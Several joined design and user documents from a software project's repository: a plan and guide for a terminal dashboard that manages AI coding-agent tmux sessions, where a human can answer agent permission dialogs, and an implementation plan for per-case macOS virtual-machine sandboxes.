While the TUI is open and a session flips to NEEDS YOU: flash the row, ring BEL, and optionally emit OSC 9 (desktop notification in kitty/WezTerm/iTerm2, and it traverses SSH). This is the herdr sidebar promise delivered even when the terminal is backgrounded.
### Degraded mode (server down)
`sc` works without the server today and the TUI must too: when no server answers, enumerate `tmux -L codeman list-sessions` + read `state.json` (read-only), show a "server not running" header line, and offer attach only (no states, no approvals). This keeps the "web server crashed, get me to my sessions" path alive.
## 4. Architecture
### A client of the server, not a second brain
Everything live comes from the API the web UI already uses:
| Need | Endpoint |
| --- | --- |
| Session list + history | `GET /api/sessions/unified` |
| Live updates | SSE `GET /api/events` (heartbeat `sse:heartbeat` already exists; fall back to 2s polling) |
| Plan usage chip | latest status-telemetry snapshot (`plan-usage-latest`) |
Server discovery and auth reuse what exists: instance config from `src/config/instance.ts` (`CODEMAN_INSTANCE`, `CODEMAN_PORT`), the probe logic from `daemon-control.ts`, credentials from `~/.codeman/.env` (the established `codeman attach` pattern), self-signed HTTPS accepted for loopback probes (the hooks-on-HTTPS lesson). Multi-user scoping comes free: the API only returns what the authenticated user owns.
### Renderer: hand-rolled, zero new dependencies (decision)
Options considered:
- **Ink (React for CLIs)**: what Claude Code uses. Pros: layout engine, ecosystem. Cons: pulls React into a CLI that today ships only commander+chalk; rerender model fights the two things we care most about (a raw-ANSI preview region and 2Hz glyph animation without flicker); version-pins React for every `npm i -g aicodeman`.
- **blessed/neo-blessed**: unmaintained, skip.
- **Hand-rolled screen core** (recommended): this repo hand-rolls ANSI everywhere already and has the expertise (regex-patterns, stripAnsi, the xterm work). The core is small and boring: alt screen + raw mode + cursor-home full-frame repaint from an off-screen string buffer, throttled to state changes and the 2Hz animation tick, wrapped in DECSET 2026 (synchronized output) where supported so repaints are atomic in modern terminals (tmux, kitty, WezTerm, iTerm2). No diffing needed at these frame rates.
The one genuinely tricky pure function: SGR-aware line clipping for the preview (keep colors, strip cursor movement/OSC/DECSET, clip to width while carrying SGR state, reset at EOL). That is a pure module with exhaustive unit tests, and it is exactly the kind of function Ink would not have given us anyway.
### Module layout
```
src/tui/
tui-app.ts entry + main loop + attach handoff (IO)
tui-client.ts API + SSE client, degraded-mode enumeration (IO)
tui-model.ts pure: state store, grouping, ordering (reuses PR #303 helpers)
tui-layout.ts pure: responsive layout math, row building
tui-ansi.ts pure: SGR-aware clip/filter for the preview
```
Pure modules unit-test with no TTY. `cli.ts` gains one thin `tui` command registration (and `--list`/`<n>` fast paths for `sc -l` / `sc 2` parity, which must stay fast: they short-circuit before any screen setup).
## 5. CLI-wide polish (the rest of "make it much nicer")
A shared style kit, `src/cli-style.ts`: one palette (mirroring the web's status colors), one glyph set with fallback, `heading()`, `kv()`, `table()` (width-aware, fixes the Antigravity overflow), `spinner()` (finally: the 30s silent daemon/service waits get a live line), `confirm()` (used by `reset --force`'s missing prompt and `x` in the TUI). Then the mechanical fixes from §1: colorize `doctor` through the hook that already exists for it, dedupe the `codeman web` startup line, colorize the server's security warning, fix the README `codeman attach` description and the Ctrl+B/Ctrl+A detach drift, TTY/NO_COLOR gates everywhere.
## 6. Phasing
| Phase | Contents | Size |
| --- | --- | --- |
| 0 | `cli-style.ts` + mechanical fixes (§5), real CLI tests (retire the fixture parser in `test/cli-commands.test.ts`) | S |
| 1 | `codeman tui` core: list + states via SSE, cursor + 1-9, attach/return loop, kill w/ confirm, new session, narrow mode, degraded mode, `sc` alias flip + `--list`/`<n>` parity | M/L |
| 4 | Retire `tmux-chooser.sh`/fold `tmux-manager.sh` (keep as thin wrappers for one release), docs/README/wiki, screenshots for promo | S |
Phases 0-1 are the useful minimum; 2 is where it beats herdr's sidebar (answering approvals from the dashboard); 3 is delight.
## 7. Testing
- Pure modules (`tui-model/layout/render/keys/ansi`): plain vitest, frame snapshots as stripped strings plus targeted ANSI assertions.
- Interactive E2E: spawn the built TUI under `node-pty` (already a dependency), feed keys, assert on captured frames; the vitest tmux mock (`IS_TEST_MODE`) keeps attach paths inert. Port rules per CLAUDE.md (3150+, `app.inject()` where possible by testing `tui-client` against injected routes).
- tmux socket and data dir always via instance config (`dataPath()`, `-L codeman`); a beta instance TUI sees only its own world.
- Never bulk kill, always confirm, never touch another session implicitly, refuse killing the session the TUI runs in (w1/w2/w3 are sacred).
- Input is single-line with `\r`, via the server (never raw tmux send-keys from the TUI while the server owns the session).
- Approvals answering goes through the server's re-capture + 409 path, never blind keystrokes.
-`status off` on panes stays the default; any chrome is opt-in.
- No new runtime dependencies; the npm package stays light.
## 9. Decisions (resolved 2026-08-16)
1.**Bare `codeman` does NOT open the TUI** (owner decision): the web UI is the main thing, the TUI is additional. `codeman tui` only.
2.**`sc` stays the bash chooser for now**; the alias flip is a follow-up once the TUI has mileage. `codeman tui --list` / `codeman tui <n>` provide the same fast paths for people who want to switch.
3. Opt-in tmux status line: deferred to phase 3 along with the `--pick` popup switcher.
4. Preview tail goes over the API (auth/multi-user/remote-consistent); previews are simply unavailable in degraded server-down mode.
5. Name is `codeman tui` (the test fixture historically expected it).
Initial PR scope: phases 0-2. Phase 3 (mouse, popup switcher, status line, OSC 9) and phase 4 (bash chooser retirement) are follow-ups.
`codeman tui` is a full-screen dashboard for your Codeman sessions, in the terminal.
It shows every session grouped by whether it needs you, lets you answer a permission
dialog or send a prompt without switching anywhere, and puts you inside a session's
tmux pane with one keystroke.
It is **additional, not a replacement**: the web UI stays the primary surface and
gets every feature first. The TUI exists for the terminal workflow (SSH, Termius,
a tmux window you keep open all day), and it is a *client* of the running server,
so the two surfaces can never disagree about what a session is doing. It is also
not a multiplexer: tmux still owns every pane, and attaching hands the terminal to
tmux rather than proxying bytes.
## Starting it
```bash
codeman tui # the dashboard
codeman tui --list # print the numbered session list and exit
codeman tui 2# attach straight to session 2 of that list
```
The two fast paths are the scriptable ones.
Neither sets up a screen, so both are as quick as the one API call they make, and
`--list` prints plain text when piped, so it composes with `grep`/`awk`.
What it needs:
| Needs | What you get |
| --- | --- |
| **Full features** | A running Codeman server (states, approvals, preview, prompts, search, digest). The TUI finds it the way `codeman attach` does: `CODEMAN_API_URL`, else loopback on `CODEMAN_PORT` for this `CODEMAN_INSTANCE`. The self-signed certificate an `--https` install generates is accepted, as it is everywhere else in the CLI. |
| **Server down** | It still starts, in **degraded mode**: sessions are enumerated straight from `tmux -L codeman` plus a read-only peek at `state.json`, and attach is the only verb. See [Troubleshooting](#troubleshooting). |
| **A terminal** | `codeman tui` refuses to run when stdin/stdout are not a TTY, and says to use `--list` instead. A cron job or a pipe therefore fails loudly rather than emitting escape codes into a log. |
## What it looks like
A real frame at 100x30 (`NO_COLOR`, trailing blank rows trimmed). The selected
session has a pending permission dialog, so the preview pane leads with the card:
│ 1 -import { SessionManager } from "../session-manager.js";
│ 2 +import type { SessionPort } from "../web/ports/session-
│
│ Bash(npm run typecheck)
│ └ tsc --noEmit: no errors
│
│ ✻ Actualizing… (2m 14s · ↓ 12.3k tokens)
↑↓ select · ⏎ attach · y approve · n deny · 1-9 option · p prompt · x kill · / search · g digest ·
```
- **Header**: the machine, the server version, how many sessions are live, and the
plan-usage chip (the same statusLine telemetry that feeds the web chip, when the
server has a snapshot). A `⚠ n` badge counts pending approvals.
- **Sidebar**: every session, grouped and numbered.
- **Preview**: a live tail of the selected session, its own colors preserved, with
the parsed dialog card on top when that session is blocked.
- **Footer**: only the keys that work right now. `n` reads `n new` normally and
`n deny` when the selected session has a dialog, because it cannot be both.
The same world through `--list`:
```
1 waiting w6-docs /home/you/dev/docs
2 blocked w4-api-refactor /home/you/dev/api
3 working w1-codeman /home/you/dev/codeman
4 working w2-gallery /home/you/dev/gallery
5 idle w3-promo /home/you/dev/promo
6 done api-hotfix /home/you/dev/api
```
The numbers are the same on both surfaces, so `codeman tui --list` then
`codeman tui 4` is one thought.
## The four groups
Groups are always in this order, and a session is in exactly one of them:
| Group | Glyph | Means | Comes from |
| --- | --- | --- | --- |
| **NEEDS YOU** | `⚠` | A permission or question dialog is blocking the agent | The approvals inbox (`permission_prompt` hooks, with the on-screen options parsed) |
| | `✋` | Waiting for your next instruction, or errored | `idle_prompt`, or an errored session (equally something only a human clears) |
| **WORKING** | `✻` animating | A turn is running | The same working classification the web dashboard uses |
| **IDLE** | `○` | Live, but sitting there | |
| **RECENT** | `✔` | A past session from the unified list | History rows, no live pane |
Ordering inside a group is "the one that has waited longest, first": blocked
sessions sort by how long the dialog has been up, working sessions by when their
turn started (the pane's last Enter, since a working pane repaints every second
and would otherwise always look freshly started), and quiet ones by last activity.
That is the ordering the web home screens already use.
The cursor sticks to a **session**, not a row number, so a session that jumps to
NEEDS YOU does not drag your selection with it. The number beside each row is what
`1-9` and `codeman tui <n>` mean, and it is renumbered on every re-sort.
When a new dialog appears, the terminal bell rings once, for that dialog only: the
same item announced twice does not ring twice.
## Keymap
| Key | Does |
| --- | --- |
| `↑``↓` or `j``k` | Move the cursor. PageUp/PageDown jump five rows. |
| `Enter` | Attach to the selected session (see [Attaching](#attaching)) |
| `1`-`9` | Jump to that row and attach. When a dialog is on screen, a digit answers it instead (see below). |
| `y` | Approve the selected session's dialog |
| `n` | Deny it, or **start a new session** when there is no dialog |
| `p` | Send one line to the selected session without attaching |
| `x` | Kill the selected session; `y` confirms, any other key cancels |
| `/` | Search sessions, events and files |
| `g` | Away digest: what happened while you were gone |
| `?` | Help overlay |
| `Esc` | Close whatever overlay is open |
| `q` or `Ctrl+C` | Quit, restoring the screen you started with |
Inside the `p` composer and the `/` query: `←``→``Home``End``Delete`
`Backspace` plus `Ctrl+A` / `Ctrl+E` / `Ctrl+U` / `Ctrl+W`, `Enter` to send or open,
`Esc` (or `Ctrl+C`) to cancel. In the kill confirmation you retype the session name;
anything else cancels. In the `n` pickers, type to filter, `Enter` chooses.
Verbs that need the server (`y`/`n`/`p`/`x`/`/`/`g`) say so in degraded mode
instead of failing silently; `Enter` and `1-9` keep working.
### `p` sends exactly one line
The composer is a single line by design, ending in a carriage return: that is the
input contract every Codeman path follows, because multi-line text breaks the
agent's own composer. Pasted newlines become spaces rather than being rejected, so
a paste cannot silently run a different command than the one you read.
## Answering approvals
This is the thing the terminal could not do before. Select a blocked session and:
-`y` approves.
-`n` picks the parsed "No" option, or sends Esc when the dialog did not parse one.
- A digit picks that numbered option, **but only a digit the dialog actually
offers**. A digit with no matching option falls through to the list's own
jump-and-attach binding, so it can never be typed at whatever has focus.
The answer goes through `POST /api/approvals/:id/answer`, which **re-captures the
pane before it types anything**. If the dialog is no longer on screen (you answered
it in tmux a moment ago, or the agent moved on), the server refuses with a 409 and
the TUI says `that dialog is no longer on screen` rather than pressing a key into a
live composer. The answer is scoped to the options the server parsed off the actual
frame, never to a guess.
An idle prompt (`✋`) is not a dialog: there is nothing to approve, so `p` is the
reply path and the footer says `p reply` instead of `p prompt`.
## Attaching
`Enter` suspends the dashboard (main screen back, cooked mode back) and hands the
terminal to tmux with `stdio: inherit`. Colors, mouse and paste are tmux's, at full
fidelity.
**Press `F1` to come back.** One key, no modifier to hold or release, nothing to
type in a particular order. tmux's own way out is a chord — press the prefix, let
go, then a letter — and beta testing showed that is genuinely hard to convey: the
bar first named the wrong letter (tmux binds lowercase `d` to `detach-client` and
capital `D` to `choose-client`), and once corrected it still failed for anyone who
kept Ctrl held, because that sends `Ctrl+D`, which tmux leaves unbound. So the TUI
claims `F1` in tmux's prefix-less key table for the length of the attach and gives
it back afterwards. The chord still works; it is simply not what you are told to
press.
You do not have to remember any of it. For as long as the attach lasts the pane
wears a bar across the top:
```
1 w3-codeman-… 2 w4-codeman-… 3 testcase … alt+1-9 switch · F1 back to the codeman dashboard
```
That is the **session strip**: the other sessions stay visible from inside a pane,
numbered exactly as the dashboard numbers them, with the one you are in inverted.
`Alt+1`..`Alt+9` switch between them without going back to the dashboard first. With
more sessions than fit, the strip shows a window around the current one and marks
each cut end with `…`; the way-out hint is measured first and always keeps its space.
Codeman keeps the status bar off on its panes (the web UI carries that information
around the terminal instead), so the TUI turns it on for the attach and puts it back
exactly as it was on detach, along with each window's size. Every session the strip
can switch to is dressed and sized the same way, so switching is instant and lands
in a pane that already fills your terminal.
Detaching leaves the agent running; typing `exit` or pressing `Ctrl+D` would end it,
which is the difference the bar exists to make obvious. If an agent does exit, its
pane stays as a corpse: the TUI refuses to attach to a dead pane and offers `r` to
resume the conversation in a fresh one instead.
Three cases:
| Where you are | What happens |
| --- | --- |
| Not in tmux | `tmux -L codeman attach-session` |
| Already in tmux on Codeman's socket | `switch-client`, so you do not nest |
| In tmux on a **different** socket | Refused, with an explanation: detach from that tmux first, then run `codeman tui` again |
A direct-PTY session has no pane to attach to, and says so.
**`Enter` on a RECENT row resumes that conversation** instead: there is no pane to
attach to, so the TUI creates a new claude session carrying the old transcript
(`resumeSessionId`, exactly what the web UI's "Resume Conversation" list does), in
the directory it originally ran in and under its old name, then attaches to it. It
is claude-only, and a row with no working directory or no conversation id says why
rather than resuming something else.
`x` never bulk-kills: it kills one session, only after you retype its name, never a
history row, and never the session the TUI itself is running in.
## Over SSH, and on a phone
The TUI is an ordinary terminal program with no local dependencies beyond tmux, so
`ssh box` then `codeman tui` works exactly like running it locally. There is no
separate remote mode.
Below 72 columns (Termius, an iPhone in portrait) the preview pane is dropped and
rows take two lines each, keeping the cursor, the live states and the
answer/prompt/kill verbs. The switch is
width-driven at draw time, so unfolding a foldable or resizing a window re-lays out
immediately; there is no mode flag to set.
## Troubleshooting
**"The Codeman server rejected these credentials."** The server has
`CODEMAN_PASSWORD` set. Export `CODEMAN_PASSWORD` (and `CODEMAN_USERNAME` if it is
not `admin`), or put them in the data dir's `.env` (`~/.codeman/.env`), which is
where `codeman attach` already reads them from.
**`server not running: attach only`** in a yellow banner. Nothing answered on the
expected port, so the TUI fell back to enumerating tmux. You get names and attach;
you do not get states, approvals or previews, because those only exist on the
server. Start the server (`codeman web -d`, or `systemctl --user start codeman-web`)
and the banner clears on its own: the TUI keeps re-probing.
**It found the wrong server, or none.** Discovery is instance-scoped. A beta
instance (`CODEMAN_INSTANCE=beta`) has its own data dir *and* its own tmux socket,
so its TUI sees only its own sessions. Set `CODEMAN_PORT` or `CODEMAN_API_URL`
explicitly when you run more than one.
**"this terminal is already inside tmux on socket ..."** You are in a tmux session
on a socket that is not Codeman's, so attaching would nest two multiplexers whose
prefix keys collide. Detach from that tmux and run `codeman tui` from outside.
**Boxes and glyphs render as garbage.** The TUI picks a glyph tier from the
environment: no `TERM` (or `dumb`), or a non-UTF-8 locale, gets the ASCII set
(`[!] [w] [*] [-]`, `+`/`-`/`|` frames). Force it either way with
`CODEMAN_TUI_GLYPHS=ascii|unicode|nerd`.
**Colors.** Standard `NO_COLOR` / `FORCE_COLOR` handling (chalk's, the same as the
rest of the CLI). Under `NO_COLOR` the frame is cursor addressing and text only,
and the preview's own colors are stripped too, so a session's output cannot repaint
the dashboard.
**It refuses to open at all**, saying it needs an interactive terminal. stdout or
stdin is not a TTY. That is the guard: use `codeman tui --list`.
## Related
- [`docs/tui-plan.md`](tui-plan.md): the design record. Why hand-rolled ANSI, why a
client and not a second brain, and what is deliberately deferred.
- [`docs/approvals-inbox-plan.md`](approvals-inbox-plan.md): where the parsed
dialogs and the answer endpoint come from.
- [`docs/remote-sessions.md`](remote-sessions.md): remote-SSH cases, which the TUI
> **Status: SHIPPED — deployed to prod + pushed to master, not yet released (2026-06-14).** Opt-in via App Settings → Display → **Plan Usage Limits** (`showPlanUsageLimits`, default OFF). Commits `c82f6c8` (feature) → `4d9d93d` (end-to-end fixes) → `eae225b` (per-user reconcile) → `95fb5fc` (init-snapshot replay). Full suite green (2869), CI green. No changeset/version bump yet.
> **Status: SHIPPED — deployed to prod + pushed to master, not yet released (2026-06-14).** App Settings → Display → **Plan Usage Limits** (`showPlanUsageLimits`). **Default changed in 1.9.3: desktop now defaults ON, handhelds stay OFF, resolved via `planUsageChipEnabled()`.** The per-device notes further down describing it as opt-in/synced record the original 2026-06-14 shape, not current behavior. Commits `c82f6c8` (feature) → `4d9d93d` (end-to-end fixes) → `eae225b` (per-user reconcile) → `95fb5fc` (init-snapshot replay). Full suite green (2869), CI green. No changeset/version bump yet.
<!-- Design doc drafted 2026-07-28 from WWDC26 session 224 research. STATUS: PLANNED, NOT IMPLEMENTED. Blocked on macOS 27 "Golden Gate" (beta now, GA expected fall 2026). -->
# VM Cases (macOS Virtualization framework), Implementation Plan
## Status
PLANNED, nothing implemented. This is the design + phased execution plan for a native-macOS VM isolation tier for cases ("the VM subsystem"), modeled on Docker cases (`docs/docker-cases-plan.md`). Testbed prerequisite: a macOS 27 host (see Section 8).
**⚠ DESIGN DIRECTION (owner, 2026-07-29): the subsystem is GUI-first.** Users want real macOS desktops, not headless SSH machines. Guests may be macOS (GUI-only in practice) or Linux (GUI or headless). Key decision 3 below carries the full consequences; anything in this doc that reads as "Linux-first / headless-first" predates this and has been revised.
**2026-07-29: Phase 0 substantially validated on the beta testbed; full Apple-stack reference now lives in [`docs/vm-subsystem-apple-stack.md`](vm-subsystem-apple-stack.md)** (API surfaces, beta bugs, our empirical results, and design implications). Plan-relevant corrections from that work: vmnet's topology/port-forwarding APIs are macOS 26 (only the loopback fix is 27); guest provisioning is macOS-guests-only (Linux stays cloud-init, proven working); DiskImageKit has NO flatten/merge, so the `export` subcommand ships the layer chain (or flattens in-guest) instead of flattening; seed ISOs are base-build-time only, never attached at case runtime; per-case EFI variable stores are mandatory; guest health checks read DHCP leases, never serial/ping.
## 1. Context and motivation
WWDC 2026 session 224 ("Expand the Capabilities of your Virtualization App", https://developer.apple.com/videos/play/wwdc2026/224/) shipped the missing pieces for programmatic, fleet-style VM management on macOS:
- **`VZMacGuestProvisioningOptions`**: automated first-boot setup of a macOS guest (user account, auto-login, SSH enabled) with zero interactive setup.
- **DiskImageKit**: stacked disk images on the Apple Sparse Image Format (ASIF): a read-only base layer plus cheap per-VM cache/overlay layers. Direct analog of Docker image layers + writable container layer.
- **vmnet framework**: custom network topologies and port forwarding from the host process.
- **AccessoryAccess**: USB passthrough (not relevant to Codeman, out of scope).
Codeman's isolation story today is Docker cases. On macOS, Docker means Docker Desktop / a Linux VM anyway, with weaker fidelity and a heavyweight dependency. The Virtualization framework gives hardware-virtualized per-case sandboxes natively, with a layered-image story that mirrors what `scripts/build-agent-image.mjs` does for Docker. This is the premium native-macOS tier ON TOP of Docker cases, never a replacement (Docker remains the cross-platform story; the Linux prod box cannot use any of this).
| Host OS | macOS 27 "Golden Gate" required for the new APIs (dev beta since 2026-06-08, public beta since 2026-07-13, GA expected fall 2026) |
| Host hardware | Apple Silicon only (macOS 27 dropped Intel). Testbed: the owner's dedicated MacBook (Section 8); the M4 Mac mini (macOS 26.4, runs the second Codeman install) stays on stable + untouched |
| Guest provisioning | `VZMacGuestProvisioningOptions` needs macOS 27 on BOTH host and guest. Linux guests provision via cloud-init instead |
| macOS guest concurrency | **Hard kernel cap: 2 concurrent macOS VMs per host. MEASURED on 27 beta 4 (2026-07-29), not inferred**: the 3rd VM is refused instantly with `VZErrorDomain` code 6 while 39% of RAM is free, so more hardware does NOT raise it. Since macOS GUI guests are the headline use case, this is a real product capacity limit to schedule around and surface in the UI. Linux guests are uncapped (resource-bound only) |
| Language | Virtualization framework is Swift/ObjC only; Node cannot call it. Requires a Swift helper binary (Key decision 2) |
| Entitlement | Host process needs `com.apple.security.virtualization`. Fine for a locally built dev binary; distribution needs signing thought (Section 9) |
| Nested virtualization | Linux-guest-only on M3+. A macOS 27 VM cannot dependably host its own guests, so the host-side APIs must be tested on bare-metal 27 (dual-boot) |
| CI | Cannot run in CI (needs beta macOS on Apple Silicon). Same answer as tmux/docker: no-op all VM IO under `VITEST`, unit-test the pure parts |
## 3. Goal and user stories
Add "VM cases" to Codeman: a case can point at a per-case virtual machine on a macOS host, and any CLI backend runs inside it over the existing remote-SSH session machinery. A LOCATION OVERLAY on cases, exactly like remote-SSH and Docker cases, NEVER a sixth `SessionMode`.
- As a Mac user, I link a case to a VM so an autonomous run executes behind a hardware virtualization boundary (stronger than Docker's shared kernel) while file viewing, transcripts, and hooks keep working.
- Per-case VMs are instant and cheap: a shared provisioned base image plus a per-case overlay, not a full image copy per case.
- Killing a session kills only its in-guest tmux; the VM stays up while sibling sessions remain; case delete tears the VM down.
- I export a case's VM overlay as a portable artifact (mirror of `docker-exports/`), secrets excluded.
- On a non-mac host, or a Mac without the helper, the feature is invisible: zero UI, zero probes, zero errors.
Non-goals for the MVP: USB passthrough, custom Virtio channels (Phase 3 candidate), macOS-guest fleets (capped at 2 anyway), Kubernetes-style orchestration, Intel Macs.
## 4. Architecture
```
Codeman (Node, unchanged session layer)
| JSON over stdout (same pattern as shelling out to docker/tmux)
v
codeman-vm (Swift package: CLI + per-VM GUI runner app in the console session)
| Virtualization / DiskImageKit / vmnet
v
per-case VM (macOS or Linux)
|-- GUI mode: VZVirtualMachineView in a window --> guest screen sharing --> browser (noVNC)
|-- shell: SSH on vmnet IP --> existing remote-SSH tmux machinery
^ VirtioFS: host case dir mounted at the SAME absolute path
```
Note the runner is a **GUI app in the console user's session**, not a detached daemon: a daemon-launched VM cannot render, which is fatal for macOS guests and for Linux desktop cases.
### Key decision 1: location overlay, not a mode
Identical reasoning to Docker/remote-SSH (see CLAUDE.md): the session layer, respawn, Ralph, recovery, and quick-start plumbing all stay untouched. `SessionMode` stays five-valued. State mirrors the Docker pair: `~/.codeman/vm-hosts.json` + `vm-cases.json`, new `src/vm-hosts.ts` with the storage + pure helpers split.
### Key decision 2: Swift helper CLI (`codeman-vm`)
The framework is Swift-only, so all VM work lives in a SwiftPM package (`packages/codeman-vm/`), a CLI with a stable JSON contract:
-`create-base --guest linux|macos`: build the shared base image. Linux: boot an arm64 cloud image with EFI + cloud-init, install Node 22 + tmux + the four CLIs (same inventory as `docker/agent.Dockerfile`), seal as base ASIF. macOS: IPSW restore + `VZMacGuestProvisioningOptions` (agent user, SSH on), then **desktop-readiness baking**, which is mandatory for GUI guests: suppress the per-user first-login assistant (`com.apple.SetupAssistant` keys + the User Template), enable auto-login (`autoLoginUser` + `/etc/kcpassword`), disable screensaver/lock/display-sleep, and set a static wallpaper (animated "aerials" wallpaper is unusable over remote display). ⚠ Use RAW (not ASIF) for macOS guest disks until the beta's macOS-guest space-reclamation bug is fixed.
-`export <case>` / `import`: flatten overlay + workspace tar + manifest, credentials excluded (mirror of docker-export).
A VM dies with its owning process, so `start` spawns a DETACHED per-VM runner process (analog of the detached `scripts/self-update.sh` trick) rather than a monolithic daemon; `status` talks to it over a unix socket in the instance data dir (`dataPath()`, never a hardcoded `~/.codeman` path).
### Key decision 3: multi-guest, and GUI is a first-class mode (REVISED 2026-07-29 by the repo owner)
The subsystem supports both macOS and Linux guests, and a guest runs in one of two **display modes**:
| | macOS guest | Linux guest |
| --- | --- | --- |
| **GUI mode** | **the point of the feature**; a real macOS desktop. Mandatory: nothing renders without an attached `VZVirtualMachineView` in an unlocked host session | supported (EFI + virtio-gpu framebuffer) for desktop Linux cases |
| **Headless mode** | not offered: a macOS guest with no view renders nothing, so a "headless macOS desktop" is a contradiction. SSH-only macOS is possible but is not what this feature is for | supported and cheap; the natural mode for agent/CI work, driven over SSH |
Consequences that flow from GUI being first-class:
- VM processes are **GUI apps in the console user's session** (LaunchAgent / `launchctl asuser`), never daemons. A daemon-launched VM cannot render.
- **The host is part of the product surface**: it must auto-login, never lock, never sleep, and keep a live WindowServer. Host lock == every VM's screen goes black, so the screen lock is effectively a global kill switch for every VM display on the machine. The product must own these host settings rather than treat them as user preference.
- **FileVault conflicts with unattended GUI hosting** and the trade-off must be a deliberate choice: FileVault disables auto-login, so a full-disk-encrypted host needs a human at a keyboard (or a remote screen-sharing session) after every reboot before any VM can render. Options are (a) FileVault on, accept manual login per boot, (b) FileVault off on a dedicated VM host so it boots straight into a rendering session, or (c) FileVault on plus a remote-unlock runbook. Codeman should detect the state and tell the user which one they are in instead of silently serving black screens.
- **Guests must be desktop-ready, not just booted**: auto-login, no screensaver/lock, and the per-user first-login assistant pre-suppressed at base-image time (`com.apple.SetupAssistant` keys, plus the User Template so later accounts inherit it). Otherwise the user connects to a login prompt or a setup wizard, which is exactly what happened during the first hands-on run.
- **Capacity is capped for macOS**: at most 2 concurrent macOS VMs per host, confirmed by our own test on 27 beta 4 (3rd refused with `VZErrorDomain` 6 at 39% free RAM; it is a kernel quota, so bigger hardware does not help). Scheduling must queue or evict beyond 2, the UI must explain why, and the scheduler should tolerate the acknowledged slot-leak bug (a slot occupied with nothing running, host-reboot to clear). Linux guests are uncapped and bounded only by host resources, which is the lever for scaling case counts on one machine.
- **Access is via the guest's own screen**, viewable in a browser through the noVNC chain (see `docs/vm-subsystem-apple-stack.md` §8), so no client-version or client-install requirements land on the user.
Provisioning per guest type: `VZMacGuestProvisioningOptions` for macOS (needs 27-on-27, first-boot-only, and does NOT skip the per-user wizard), cloud-init NoCloud seed ISO for Linux (proven working).
### Key decision 3b: the GUI VM host profile, and supervision that catches black screens
GUI hosting only works if the host is configured for it and supervised. This profile was derived the hard way on the testbed (prototyped there 2026-07-30) and should be what `codeman-vm` installs and verifies:
**Host profile** (the product should own these, not leave them to preference):
1.**No login barrier.** Either FileVault off + auto-login (a dedicated VM host boots straight into a rendering session, fully unattended), or FileVault on and remote reboots done with `sudo fdesetup authrestart`, where the pre-boot unlock *is* the login so the machine returns already logged in with encryption intact. **`authrestart` is VERIFIED on the testbed (2026-07-30): the host rebooted remotely and came back with a live logged-in console session, FileVault still enabled, no password prompt** — this is the recommended pattern for an encrypted GUI VM host. Plain reboots on a FileVault host always need a human, so Codeman should detect that combination and warn instead of serving black screens.
2.**Never lock**: lock policy off (needs the account password, so it is a setup step, not a scriptable one) plus `caffeinate -d -i -m -u` re-armed per session.
3.**Never sleep**: `pmset -a sleep 0 displaysleep 0 disablesleep 1`; a physical display is NOT required (a lid-closed laptop renders fine, only an unlocked session matters). Note OS updates reset these.
4.**Session-independent control plane**: run VPN/remote access as a system service, never a session app, and keep the access chain (forwards, VNC proxies, web endpoints) in LaunchDaemons so a session restart cannot sever operator access.
**Supervision** must be a **root LaunchDaemon**, not a user LaunchAgent. This is the load-bearing detail: a user agent cannot launch a GUI app into the Aqua session, so its restart attempts fail *silently* (the child dies instantly, leaving an empty log while the supervisor cheerfully reports success). A root daemon can, via `launchctl asuser <uid> sudo -u <user> …`, and those launches persist. Prototyped and verified on the testbed 2026-07-30; a working supervisor runs on a short interval and:
- Restarts the runner when the process is gone **or when its log shows `WindowServer event port death`**, which means it is permanently blind while still looking alive.
- Defers restarts while the console is at the login window, and launches into whichever session actually exists (resolve the console user with `stat -f %Su /dev/console`, never a hardcoded one).
- Re-points the guest port-forward whenever the guest's NAT lease changes, which happens on **every guest boot** under plain NAT. A vmnet DHCP reservation for a stable per-case IP is the better long-term answer.
- **Re-applies host power settings**, because `pmset -a disablesleep 1` does NOT survive a reboot (caught on the supervisor's first run after a real reboot) and OS updates reset it too.
- Re-arms the keep-awake helper, which dies with its session.
- Ideally also samples the guest framebuffer for non-black content, since a black screen is the one symptom common to every failure mode here.
`pgrep` alone is worthless for health: every failure mode in this session presented as a healthy process.
### Key decision 4: sessions ride the existing remote-SSH machinery
A provisioned guest is literally an SSH host on a vmnet IP. Session launch = the remote-SSH flow with the host swapped in: durable remote `tmux -L codeman-remote`, session names failing `SAFE_MUX_NAME_PATTERN` on purpose, EVERY ssh command line through `buildSshConnectionArgs()` (command-injection invariant), run flows through `POST /api/quick-start` (never `POST /api/sessions`, which stat-validates `workingDir` locally). What is genuinely new is only lifecycle (create/start/stop/export) and the vm-hosts/vm-cases overlay state.
### Key decision 5: workspace via VirtioFS at the same absolute path
Mirror the Docker bind-mount invariant: the case workspace is a real host directory shared into the guest via VirtioFS and mounted at the SAME absolute path. That keeps file-routes/watchers on real host bytes and makes the in-guest transcript projHash match the host. Without this, transcripts/attachments/file viewer all silently degrade.
- Credentials are SEEDED (read-only share, copied into the guest once at create), never shared read-write, and excluded from exports: byte-for-byte the Docker cases rule and rationale.
- Hooks: on the loopback-only prod bind a guest cannot reach `127.0.0.1:3000`. Mirror `CODEMAN_DOCKER_BRIDGE_HOOKS` with a `CODEMAN_VM_BRIDGE_HOOKS` opt-in listener on the vmnet gateway IP; otherwise idle detection falls back to output-based, same as Docker.
Config hash label on the VM (guest type, cpu/mem, share list); a drifted launch is REFUSED, never silently launched stale. One VM per case shared by all sessions; session kill = in-guest tmux kill only; case delete = stop + remove overlay; instance-scoped boot reaper for orphaned runner processes.
## 5. Implementation phases
**Phase 0, testbed (no repo code):** dedicated MacBook on the macOS 27 beta, remotely accessible over the tailnet (setup protocol in Section 8), Xcode 27 beta, then a throwaway Swift script proving the loop: create base -> overlay -> boot -> ssh in. This validates 80% of the design before any Codeman code.
**Phase 1, `codeman-vm` helper:** SwiftPM package, the six subcommands above, JSON contract doc, detached runner + unix-socket status, Linux base image build. Deliverable is testable entirely without Codeman.
**Phase 2, Codeman integration:** types (`VmHost`/`VmCase`/`SessionVm`), `src/vm-hosts.ts` (+ pure helpers: config hash, arg building, endpoint parsing), Zod schemas, `case-routes` link/unlink + listing, `quick-start` vm branch reusing the remote-SSH launch path, `Session` threading + recovery round-trip, `VITEST` no-op layer, unit tests. Feature-detect: darwin + arm64 + helper binary present, else invisible.
- Pure helpers unit-tested (ports pattern from `docker-hosts.ts`: 26 tests there, aim similar).
- All helper-invoking IO no-ops under `VITEST` (the `IS_TEST_MODE` pattern in `tmux-manager.ts`).
- End-to-end verification happens ON the beta MacBook, per the always-end-to-end rule: real base build, real per-case overlay boot, real quick-start into the guest, workspace round-trip through VirtioFS, session-delete keeps VM up, case-delete removes it.
- CI never runs the real path; the static guards are type-level + unit-level only.
## 7. Risks
